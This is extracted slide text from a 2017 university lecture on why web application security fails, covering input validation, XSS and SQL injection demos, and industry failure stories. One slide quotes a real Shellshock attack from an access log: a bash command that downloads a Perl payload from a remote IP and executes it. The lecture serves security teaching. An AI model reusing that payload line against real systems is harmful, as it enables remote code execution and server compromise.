HOW AND WHYWEB APPSECURITY FAILS?

16.2. 2017 Tampere University of TechnologyAntti.virtanen@solita.fiTwitter: @Anakondantti

FOREWORD, 1 MINUTE

› Solita?

› Me?

› Web application?• Much more important than you may realize..

AGENDA

› How to make secure software?

› … But, everything is broken!

› … Because ...• Same mistakes are repeated.• Unthinkable, Unpossible, Impossiblator happens

› Practical web application security testing.

› Bonus: 10. fail 20. goto 10

SECURITY IS RISK MANAGEMENT

”“If you know the enemy and know

yourself, you need not fear the result of a hundred battles. ”

Sun Tzu, Art of War

Source: Hackerman, Kung Fury movie

Source: NSA recruitment video.

Source: securityintelligence.com

Source: Lizard Squad hacking group logo

SOLITA #DEVSEC LANDSCAPE

GOOD NEWS:

SECURITY IS SIMPLE!Bad news: Simple != easy

RECIPE FOR SECURE SOFTWARE

1. Design it properly. Do the right thing.

2. Do it right1. Mistake in implementation = bug = security issue

3. Prepare for the unthinkable

(Bug bounties etc. are useful too, but out of scope here.)

DO THE RIGHT THING

1. Don’t roll your own.1. Especially, don’t invent hash algorithms, RND or crypto!2. Seriously. Failure imminent and certain.

2. Follow best practices.

3. Understand what you are doing.1. Read the RFC. Understand your tools and libs.

SOMETHING UNTHINKABLEIt’s the same story every day..

UNTHINKABLE NAMES?

UNTHINKABLE DOMAINS AND DNSRECORDS (PUNY CODE ATTACK)

A PICTURE IS WORTH 1000 WORDS

› Demo-time: SVG is a picture file, right?

› Feeling lucky, punk?

WHAT THE ACTUAL **** ??

INPUT SANITATION= 80% WIN

THE SAME STORY ALL OVER!

› XSS, CSRF, SQL injection, XXE..• Are all about input validation.

› Solution: white list allowed, deny everything else.

› There’s still 20% left• You can fail session management certainly, but..• Follow the advice: Don’t invent your own and you’ll be pretty safe.

JAVASCRIPTNECESSARY (?)EVIL

JAVASCRIPT IS FULL OF EVIL(GREPPING “EVIL” FROM JS SOURCES)

The most satisfying feeling you can get in the job is... The Pwn. Let's say you find SQL injection. Blood is rushing into your brain and that's what we call The Pwn. Your brain gets a really tight feeling, like your head is going to explode any minute,.

Arnold “Iceman” Schwarzenegger, movie Pwning iron.

DEMO/PRACTICEAGAINST GRUYEREhttp://google-gruyere.appspot.com/

LET’S XSS !

› Reflected vs. Stored

› <script> doesn’t work? • No problem, JS is everywhere..

› Can’t XMLHttpRequest? • No prob, counter and fake

SQL INJECTION

› GRUYERE does not contain SQL injection..

› But .. It’s a good example of an injection

› SQL = Structured Query Language• However, “query” is a bit of a misnomer..

What is this???

INPUT SANITATION,

STILL FAILING

LOGIC ATTACKS ARE DIFFICULT

› Real example..

REAL WORLD ATTACK

FROM A REAL ACCESS LOG(CUSTOMER IP REDACTED)

› 2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print-wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wgethttp://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perlefixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid:

Google tip: Shellshock

WHAT THE ATTACKER WANTED?efixx – first lines..

core – first lines..

DEV OR OPS? OR #DEVSEC ?

› Who is responsible for that server?

› Do you need to care as a developer?

› Ultimately: What is the developer’s responsibility?

SOME FAILS 2016-­2017Stories from the trenches

FAIL 1: THE BURDEN OF LEGACYMD5 & C++ -­ “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE”

› Native code is dangerous..• ASLR & DEP make buffer overflows more difficult to exploit, but it still

happens.

› The lifespan of software can be surprisingly long..• How to update and re-evaluate working software if nothing happens?• Home-exercise: Sell this to team & customer. Involves risk and cost.

› New threats have emerged.• What parts are affected?

Screeshot removed..

FAIL 2: SHORTCUTS AND ANARCHY

› Root cause: Heavy process, not understood / accepted by devs• making developers miserable..

› The devs are innovative people..

http//unauthorized..V 1.3 coolserver

AwesomeSoftware_Upgrade.exe

FAIL 3: “I ACCIDENTALLY”

STORY 4: THE WEBHACK EVENT

› http://webhack.fi was a light-weight fun bug bounty hunt..• The targets are not publicly accessible, but were production systems we

created for our customers.

› Hackers hacked..

› .. SQL injection -> dumped the whole database

› .. But our code was fine! WAT?

ONE DOES NOT SIMPLY INJECT INTO..› One issue turned out to be a 0-day in Spring libraries..

› Hnggh..

› The moral of the story is two-fold: 1. even if you do everything right, you can still fail2. it’s not always so easy in real life..

› The gory details: https://github.com/solita/sqli-poc

FURTHER MATERIAL• From the internet:

• OWASP Top 10• https://www.owasp.o

rg/index.php/Category:OWASP_Top_Ten_Project

• OWASP ZAP proxy• https://www.owasp.o

rg/index.php/OWASP_Zed_Attack_Proxy_Project

• Kali Linux• https://www.kali.org

/